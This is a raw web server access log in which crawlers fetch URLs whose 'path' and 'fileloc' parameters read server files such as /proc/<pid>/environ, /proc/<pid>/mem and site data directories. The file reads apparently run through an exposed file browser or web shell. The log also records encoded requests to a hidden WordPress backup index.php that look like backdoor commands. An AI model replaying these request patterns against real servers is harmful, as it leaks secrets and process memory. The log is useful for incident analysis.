216.73.216.50 - - [10/Nov/2025:01:08:12 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fdoc%2Flibgcab-1.0-0%2Fchangelog.Debian.gz&path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fdoc%2Flibgcab-1.0-0 HTTP/1.1" 200 2684 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:01:08:13 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory14/node0 HTTP/1.1" 200 3951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:08:13 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/oom_score&path=//proc/695 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.79.248.20 - - [10/Nov/2025:01:08:14 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323734303337342p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733363737342q3638376561346433643336366532383930306137633835306433393062396432222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
51.77.43.178 - - [10/Nov/2025:01:08:14 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/limits&path=//proc/689 HTTP/1.1" 200 2870 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:08:14 +0000] "GET /42tsrd11284.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:08:14 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/loginuid&path=//proc/661 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:15 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/coredump_filter&path=//proc/695 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
3.93.211.16 - - [10/Nov/2025:01:08:15 +0000] "GET /our-works/tv-commercial/tvc-thach-long-hai/?path=//sys/kernel/slab/scsi_data_buffer HTTP/1.1" 200 4074 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:08:15 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/loginuid&path=//proc/664 HTTP/1.1" 200 2619 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:15 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/maps&path=//proc/664 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
18.232.11.247 - - [10/Nov/2025:01:08:16 +0000] "GET /our-works/tvc-kimino/?path=//sys/module/async_tx/holders HTTP/1.1" 500 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:08:16 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/schedstat&path=//proc/661 HTTP/1.1" 200 2629 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:01:08:16 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fdoc%2Fmultipath-tools%2Fcopyright&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fdoc%2Fmultipath-tools HTTP/1.1" 200 2886 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:01:08:17 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/cpu1/node0/memory5 HTTP/1.1" 200 3410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:01:08:17 +0000] "GET /42tsrd11284.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:08:17 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/clear_refs&path=//proc/689 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:17 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/cgroup&path=//proc/695 HTTP/1.1" 200 2745 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:18 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/oom_score_adj&path=//proc/695 HTTP/1.1" 200 2614 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:18 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/mountstats&path=//proc/661 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
114.119.154.211 - - [10/Nov/2025:01:08:19 +0000] "GET /?products=872040 HTTP/1.1" 200 4543 "https://lamphimquangcao.net/?sitemap201.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
52.44.148.203 - - [10/Nov/2025:01:08:19 +0000] "GET /our-works/tvc-caltex-havoline/?path=//usr/lib/terminfo/t HTTP/1.1" 200 2993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:08:19 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/loginuid&path=//proc/689 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:19 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/cpuset&path=//proc/695 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:08:20 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/memory12/node0 HTTP/1.1" 200 3949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:01:08:20 +0000] "GET /187rpn4971.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:08:20 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/sessionid&path=//proc/661 HTTP/1.1" 200 2616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:21 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/numa_maps&path=//proc/689 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
52.167.144.238 - - [10/Nov/2025:01:08:21 +0000] "GET /?products=1125030138 HTTP/1.1" 200 13 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:08:22 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/pagemap&path=//proc/695 HTTP/1.1" 200 2607 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
184.73.35.182 - - [10/Nov/2025:01:08:22 +0000] "GET /our-works/tv-commercial/tvc-thach-long-hai/?fileloc=//usr/lib/cgi-bin/php7.4&path=//usr/lib/cgi-bin HTTP/1.1" 200 2617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:08:23 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/mem&path=//proc/664 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:08:24 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/cpu1/node0/memory6 HTTP/1.1" 200 3412 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:08:25 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/maps&path=//proc/664 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:08:25 +0000] "GET /36qmst35100.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:08:27 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/maps&path=//proc/661 HTTP/1.1" 200 2605 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:27 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/clear_refs&path=//proc/695 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:28 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/environ&path=//proc/695 HTTP/1.1" 200 2607 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:28 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/setgroups&path=//proc/661 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:29 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/maps&path=//proc/689 HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
44.223.116.180 - - [10/Nov/2025:01:08:29 +0000] "GET /our-works/tvc-sjc/?path=//etc/network/if-up.d HTTP/1.1" 200 2949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:08:30 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/patch_state&path=//proc/695 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:08:31 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/cpu0/node0/memory8/node0 HTTP/1.1" 200 3899 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:08:32 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/cmdline&path=//proc/689 HTTP/1.1" 200 2661 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:33 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/numa_maps&path=//proc/661 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:34 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/oom_adj&path=//proc/689 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:08:34 +0000] "GET /92wkht44006.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:08:36 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/mountinfo&path=//proc/664 HTTP/1.1" 200 3758 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
18.211.148.239 - - [10/Nov/2025:01:08:36 +0000] "GET /our-works/tvc-caltex-havoline/?path=//sys/module/binfmt_misc/notes HTTP/1.1" 200 3011 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [10/Nov/2025:01:08:38 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323734303339382p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733363739382q6636346536633032653637373464376537316439373031343434666466393835222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
216.73.216.50 - - [10/Nov/2025:01:08:38 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fdrivers%2Fmtd HTTP/1.1" 499 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:01:08:38 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/mem&path=//proc/664 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:38 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/cmdline&path=//proc/695 HTTP/1.1" 200 2643 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:08:39 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory8/node0/cpu0 HTTP/1.1" 200 3445 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:08:39 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/gid_map&path=//proc/695 HTTP/1.1" 200 2623 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
98.83.177.42 - - [10/Nov/2025:01:08:39 +0000] "GET /our-works/tvc-caltex-havoline/?path=//sys/kernel/slab/request_sock_TCPv6 HTTP/1.1" 200 4095 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:08:39 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/mem&path=//proc/661 HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:40 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/personality&path=//proc/695 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:40 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/smaps&path=//proc/661 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:40 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/mem&path=//proc/689 HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:08:41 +0000] "GET /36qmst35100.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.205.222.214 - - [10/Nov/2025:01:08:42 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/bus/cec/devices HTTP/1.1" 200 2673 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:01:08:43 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory6/node0/cpu1/topology HTTP/1.1" 200 3460 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:08:43 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/comm&path=//proc/689 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:43 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/oom_score&path=//proc/689 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:43 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/mounts&path=//proc/664 HTTP/1.1" 200 3352 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
52.202.52.82 - - [10/Nov/2025:01:08:44 +0000] "GET /our-works/tvc-calci/?path=//usr/share/locale/tg HTTP/1.1" 200 2941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:01:08:44 +0000] "GET /11qytd12011.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:08:44 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/projid_map&path=//proc/695 HTTP/1.1" 200 2624 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:45 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/io&path=//proc/695 HTTP/1.1" 200 2603 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:47 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/smaps_rollup&path=//proc/661 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:47 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/comm&path=//proc/695 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:08:48 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory11/node0 HTTP/1.1" 200 3953 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:08:49 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/mountinfo&path=//proc/664 HTTP/1.1" 200 3758 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
52.45.29.57 - - [10/Nov/2025:01:08:50 +0000] "GET /our-works/tvc-caltex-havoline/?path=//usr/lib/systemd/system-shutdown HTTP/1.1" 200 3008 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:08:50 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/oom_adj&path=//proc/661 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:08:51 +0000] "GET /92wkht44006.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:08:52 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/mountinfo&path=//proc/689 HTTP/1.1" 200 3757 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:53 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/mountstats&path=//proc/664 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:53 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/sched&path=//proc/695 HTTP/1.1" 200 3018 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:54 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/mountinfo&path=//proc/661 HTTP/1.1" 200 3757 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
44.205.192.249 - - [10/Nov/2025:01:08:54 +0000] "GET /our-works/tvc-calci/?path=//usr/share/locale/tg HTTP/1.1" 200 2941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:01:08:55 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory14/node0 HTTP/1.1" 200 3953 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:08:56 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/limits&path=//proc/695 HTTP/1.1" 200 2870 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:56 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/oom_score_adj&path=//proc/689 HTTP/1.1" 200 2614 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:57 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/coredump_filter&path=//proc/695 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:57 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/coredump_filter&path=//proc/689 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:58 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/stack&path=//proc/661 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:09:00 +0000] "GET /92wkht44006.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
184.73.167.217 - - [10/Nov/2025:01:09:01 +0000] "GET /our-works/tvc-lapatie-2/?fileloc=//lib/systemd/user/graphical-session.target&path=//lib/systemd/user HTTP/1.1" 200 2918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [10/Nov/2025:01:09:02 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323734303432322p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733363832322q3962633164633236636533346261343231343130663836646338316139663265222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
51.77.43.178 - - [10/Nov/2025:01:09:02 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/mounts&path=//proc/664 HTTP/1.1" 200 3352 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:09:02 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/schedstat&path=//proc/695 HTTP/1.1" 200 2625 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:09:02 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/cpu0/node0/cpu0 HTTP/1.1" 200 3442 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
